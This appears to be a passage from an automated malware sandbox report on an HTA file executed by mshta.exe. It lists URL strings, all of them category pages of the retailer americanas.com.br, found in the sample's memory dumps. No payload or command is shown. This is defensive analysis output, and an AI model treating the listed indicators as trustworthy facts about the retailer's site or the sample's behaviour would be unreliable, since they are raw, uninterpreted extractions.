00000001.00000002.12577643255.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/pet-shop?chave=pfm_home_petshop_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/relogios-e-joias/relogios?chave=pfm_home_relogios_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574087890.00000000095DF000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/saude-e-bem-estar?chave=pfm_home_saude_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/sinalizacao-e-seguranca?chave=pfm_home_sinalizacao_menu
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558057036.000000000A98D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511657871.000000000A987000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541754594.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12549952415.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509850041.0000000009698000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542732517.000000000A98C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510847946.00000000096C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/suplementos
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/suplementos-e-vitaminas?chave=dk_hm_at_suplemento
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/suplementos-e-vitaminas?chave=dk_hm_at_suplementoam))
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/suplementos-e-vitaminas?chave=dk_hm_at_suplementog
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574087890.00000000095DF000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/suplementos-e-vitaminas?chave=pfm_home_suplementos_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/telefonia-fixa?chave=pfm_home_telefonia_menu
Source: mshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551145227.000000000AB11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511077657.000000000BE92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510715620.000000000BE7A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509074640.000000000BE8F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508336331.000000000BE85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/tv
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater/acessorios-para-tv-e-video?chave=pfm_hm_tt
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551073460.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater/home-theater?chave=pfm_hm_tt_1_0_home-thea
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512233499.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550466374.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556081838.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542146842.000000000BE13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578758949.000000000BE18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater/tv/g/marca-LG/marca-Lg/marca-lg?viewMode=l
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508760414.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506503755.000000000A99B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511332893.000000000A99C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555859176.000000000BDFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578720986.000000000BE00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater/tv?chave=pfm_hm_tt_1_0_tv
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater?chave=dk_hm_at_tvs
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12499023095.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542414345.0000000009699000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515790688.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557816485.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570090833.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566649661.0000000002EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater?chave=pfm_hm_tt_1_0_tv-e-home-theater
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506503755.000000000A99B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511332893.000000000A99C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/tv-e-home-theater?chave=pfm_home_tv_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: 